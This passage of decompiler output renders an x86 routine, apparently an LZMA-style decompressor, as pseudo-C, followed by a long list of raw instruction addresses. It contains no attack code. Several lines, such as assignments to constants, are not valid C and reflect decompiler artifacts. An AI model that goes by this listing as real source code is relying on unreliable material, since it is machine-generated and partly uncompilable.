								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t203;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L60:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L55:
								__al =  *(__ebp - 0x44);
								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
								goto L56;
							}
							L61:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t217 = __edx + 1; // 0x1
								__ebx = _t217;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L60;
							} else {
								goto L58;
							}
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							goto L69;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							L56:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1a;
								goto L170;
							}
							__ecx =  *(__ebp - 0x68);
							__al =  *(__ebp - 0x5c);
							__edx =  *(__ebp - 8);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
							 *( *(__ebp - 0x68)) = __al;
							__ecx =  *(__ebp - 0x14);
							 *(__ecx +  *(__ebp - 8)) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t192 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t192;
							goto L79;
						case 0x1b:
							goto L75;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = _t414;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}

0x00000000
0x00406f4a
0x00406f4a
0x00406f4e
0x00407005
0x00407008
0x00407014
0x00406ef5
0x00406ef5
0x00406ef8
0x0040726a
0x0040726a
0x0040726d
0x0040726d
0x00407273
0x00407279
0x0040727f
0x00407299
0x0040729c
0x004072a2
0x004072ad
0x004072af
0x00407281
0x00407281
0x00407290
0x00407294
0x00407294
0x004072b9
0x004072e0
0x004072e0
0x004072e6
0x004072e6
0x00000000
0x004072bb
0x004072bb
0x004072bf
0x0040746e
0x00000000
0x0040746e
0x004072cb
0x004072d2
0x004072da
0x004072dd
0x00000000
0x004072dd
0x00406f54
0x00406f58
0x00407499
0x00407499
0x0040749c
0x004074a0
0x004074a0
0x00406f5e
0x00406f64
0x00406f67
0x00406f6b
0x00406f6e
0x00406f72
0x00407438
0x00407484
0x0040748c
0x00407493
0x00407495
0x00000000
0x00407495
0x00406f78
0x00406f7b
0x00406f81
0x00406f83
0x00406f83
0x00406f86
0x00406f89
0x00406f8c
0x00406f8f
0x00406f92
0x00406f95
0x00406f96
0x00406f98
0x00406f98
0x00406f98
0x00406f9b
0x00406f9e
0x00406fa1
0x00406fa4
0x00406fa4
0x00406fa7
0x00406fa9
0x00406fa9
0x00406fac
0x00406fac
0x00406fac
0x00406a82
0x00406a82
0x00406a8b
0x00000000
0x00000000
0x00406a91
0x00000000
0x00406a9c
0x00000000
0x00000000
0x00406aa5
0x00406aa8
0x00406aab
0x00406aaf
0x00000000
0x00000000
0x00406ab5
0x00406ab8
0x00406aba
0x00406abb
0x00406abe
0x00406ac0
0x00406ac1
0x00406ac3
0x00406ac6
0x00406acb
0x00406ad0
0x00406ad9
0x00406aec
0x00406aef
0x00406afb
0x00406b23
0x00406b25
0x00406b33
0x00406b33
0x00406b37
0x00000000
0x00000000
0x00000000
0x00000000
0x00406b27
0x00406b27
0x00406b2a
0x00406b2b
0x00406b2b
0x00000000
0x00406b27
0x00406b01
0x00406b06
0x00406b06
0x00406b0f
0x00406b17
0x00406b1a
0x00000000
0x00406b20
0x00406b20
0x00000000
0x00406b20
0x00000000
0x00406b3d
0x00406b3d
0x00406b41
0x004073ed
0x00000000
0x004073ed
0x00406b4a
0x00406b5a
0x00406b5d
0x00406b60
0x00406b60
0x00406b60
0x00406b63
0x00406b67
0x00000000
0x00000000
0x00406b69
0x00406b6f
0x00406b99
0x00406b9f
0x00406ba6
0x00000000
0x00406ba6
0x00406b75
0x00406b78
0x00406b7d
0x00406b7d
0x00406b88
0x00406b90
0x00406b93
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406bd8
0x00406bde
0x00406be1
0x00406bee
0x00406bf6
0x00000000
0x00000000
0x00406bad
0x00406bad
0x00406bb1
0x004073fc
0x00000000
0x004073fc
0x00406bbd
0x00406bc8
0x00406bc8
0x00406bc8
0x00406bcb
0x00406bce
0x00406bd1
0x00406bd6
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406bfe
0x00406c00
0x00406c03
0x00406c74
0x00406c77
0x00406c7a
0x00406c81
0x00406c8b
0x00000000
0x00406c8b
0x00406c05
0x00406c09
0x00406c0c
0x00406c0e
0x00406c11
0x00406c14
0x00406c16
0x00406c19
0x00406c1b
0x00406c20
0x00406c23
0x00406c26
0x00406c2a
0x00406c31
0x00406c34
0x00406c3b
0x00406c3f
0x00406c47
0x00406c47
0x00406c47
0x00406c41
0x00406c41
0x00406c41
0x00406c36
0x00406c36
0x00406c36
0x00406c4b
0x00406c4e
0x00406c6c
0x00406c6e
0x00000000
0x00406c50
0x00406c50
0x00406c53
0x00406c56
0x00406c59
0x00406c5b
0x00406c5b
0x00406c5b
0x00406c5e
0x00406c61
0x00406c63
0x00406c64
0x00406c67
0x00000000
0x00406c67
0x00000000
0x00406e9d
0x00406ea1
0x00406ebf
0x00406ec2
0x00406ec9
0x00406ecc
0x00406ecf
0x00406ed2
0x00406ed5
0x00406ed8
0x00406eda
0x00406ee1
0x00406ee2
0x00406ee4
0x00406ee7
0x00406eea
0x00406eed
0x00406eed
0x00406ef2
0x00000000
0x00406ef2
0x00406ea3
0x00406ea6
0x00406ea9
0x00406eb3
0x00000000
0x00000000
0x00406f07
0x00406f0b
0x00406f2e
0x00406f31
0x00406f34
0x00406f3e
0x00406f0d
0x00406f0d
0x00406f10
0x00406f13
0x00406f16
0x00406f23
0x00406f26
0x00406f26
0x00000000
0x00000000
0x00000000
0x00000000
0x00406fbb
0x00406fbf
0x00406fc6
0x00406fc9
0x00406fcc
0x00406fd6
0x00000000
0x00406fd6
0x00406fc1
0x00000000
0x00000000
0x00406fe2
0x00406fe6
0x00406fed
0x00406ff0
0x00406ff3
0x00406fe8
0x00406fe8
0x00406fe8
0x00406ff6
0x00406ff9
0x00406ffc
0x00406ffc
0x00406fff
0x00407002
0x00000000
0x00000000
0x004070a2
0x004070a2
0x004070a6
0x00407444
0x00000000
0x00407444
0x004070ac
0x004070af
0x004070b2
0x004070b6
0x004070b9
0x004070bf
0x004070c1
0x004070c1
0x004070c1
0x004070c4
0x004070c7
0x00000000
0x00000000
0x00406c97
0x00406c97
0x00406c9b
0x00407408
0x00000000
0x00407408
0x00406ca1
0x00406ca4
0x00406ca7
0x00406cab
0x00406cae
0x00406cb4
0x00406cb6
0x00406cb6
0x00406cb6
0x00406cb9
0x00406cbc
0x00406cbc
0x00406cbf
0x00406cc2
0x00000000
0x00000000
0x00406cc8
0x00406cce
0x00000000
0x00000000
0x00406cd4
0x00406cd4
0x00406cd8
0x00406cdb
0x00406cde
0x00406ce1
0x00406ce4
0x00406ce5
0x00406ce8
0x00406cea
0x00406cf0
0x00406cf3
0x00406cf6
0x00406cf9
0x00406cfc
0x00406cff
0x00406d02
0x00406d1e
0x00406d21
0x00406d24
0x00406d27
0x00406d2e
0x00406d32
0x00406d34
0x00406d38
0x00406d04
0x00406d04
0x00406d08
0x00406d10
0x00406d15
0x00406d17
0x00406d19
0x00406d19
0x00406d3b
0x00406d42
0x00406d45
0x00000000
0x00406d4b
0x00000000
0x00406d4b
0x00000000
0x00406d50
0x00406d50
0x00406d54
0x00407414
0x00000000
0x00407414
0x00406d5a
0x00406d5d
0x00406d60
0x00406d64
0x00406d67
0x00406d6d
0x00406d6f
0x00406d6f
0x00406d6f
0x00406d72
0x00406d75
0x00406d75
0x00406d75
0x00406d7b
0x00000000
0x00000000
0x00406d7d
0x00406d80
0x00406d83
0x00406d86
0x00406d89
0x00406d8c
0x00406d8f
0x00406d92
0x00406d95
0x00406d98
0x00406d9b
0x00406db3
0x00406db6
0x00406db9
0x00406dbc
0x00406dbc
0x00406dbf
0x00406dc3
0x00406dc5
0x00406d9d
0x00406d9d
0x00406da5
0x00406daa
0x00406dac
0x00406dae
0x00406dae
0x00406dc8
0x00406dcf
0x00406dd2
0x00000000
0x00406dd4
0x00000000
0x00406dd4
0x00406dd2
0x00406dd9
0x00406dd9
0x00406dd9
0x00406dd9
0x00000000
0x00000000
0x00406e14
0x00406e14
0x00406e18
0x00407420
0x00000000
0x00407420
0x00406e1e
0x00406e21
0x00406e24
0x00406e28
0x00406e2b
0x00406e31
0x00406e33
0x00406e33
0x00406e33
0x00406e36
0x00406e39
0x00406e39
0x00406e3f
